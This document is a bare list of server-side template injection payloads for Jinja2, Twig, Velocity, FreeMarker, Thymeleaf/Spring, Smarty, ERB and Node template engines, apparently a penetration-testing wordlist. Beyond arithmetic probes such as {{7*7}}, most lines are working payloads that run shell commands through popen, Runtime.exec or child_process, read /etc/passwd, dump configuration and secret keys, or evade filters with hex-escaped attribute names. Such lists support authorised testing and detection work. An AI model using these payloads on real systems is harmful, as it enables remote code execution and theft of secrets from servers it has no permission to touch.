{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
*{7*7}
@(7*7)
{{7*'7'}}
${7*'7'}
${{7*7}}
{{config}}
{{config.items()}}
{{settings.SECRET_KEY}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__base__.__subclasses__()}}
{{request.__class__.__mro__[1].__subclasses__()}}
{{[].__class__.__base__.__subclasses__()}}
{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0].strip()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen('id').read()}}{%endif%}{% endfor %}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
${T(java.lang.Runtime).getRuntime().exec('id')}
${T(java.lang.System).getenv()}
*{T(java.lang.Runtime).getRuntime().exec('id')}
#{T(java.lang.Runtime).getRuntime().exec('id')}
#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($chr=$x.class.forName('java.lang.Character'))#set($str=$x.class.forName('java.lang.String'))#set($ex=$rt.getRuntime().exec('id'))$ex.waitFor()#set($out=$ex.getInputStream())#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ex('id')}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")}
{{constructor.constructor('return this.process.mainModule.require("child_process").execSync("id").toString()')()}}
{{range.constructor("return global.process.mainModule.require('child_process').execSync('id')")()}}
{{this.constructor.constructor('return this.process.mainModule.require("child_process").execSync("id")')()}}
#{root.class.forName('java.lang.Runtime').getRuntime().exec('id')}
{php}echo `id`;{/php}
{system('id')}
{`id`}
{{= 7*7 }}
@{7*7}
<%=7*7%>
<%= system('id') %>
<%= `id` %>
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}
{{joiner.__init__.__globals__.os.popen('id').read()}}
{{namespace.__init__.__globals__.os.popen('id').read()}}
{{lipsum.__globals__['os'].popen('id').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('id').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "Popen" in x.__name__ %}{{x('id',shell=True,stdout=-1).communicate()[0]}}{% endif %}{% endfor %}
${7*7}
*{7*7}
#{7*7}
@(7*7)
{{7*7}}
{{config.items()}}
{{request.environ}}
{{self.__init__.__globals__}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{get_flashed_messages.__globals__['__builtins__'].__import__('os').popen('id').read()}}
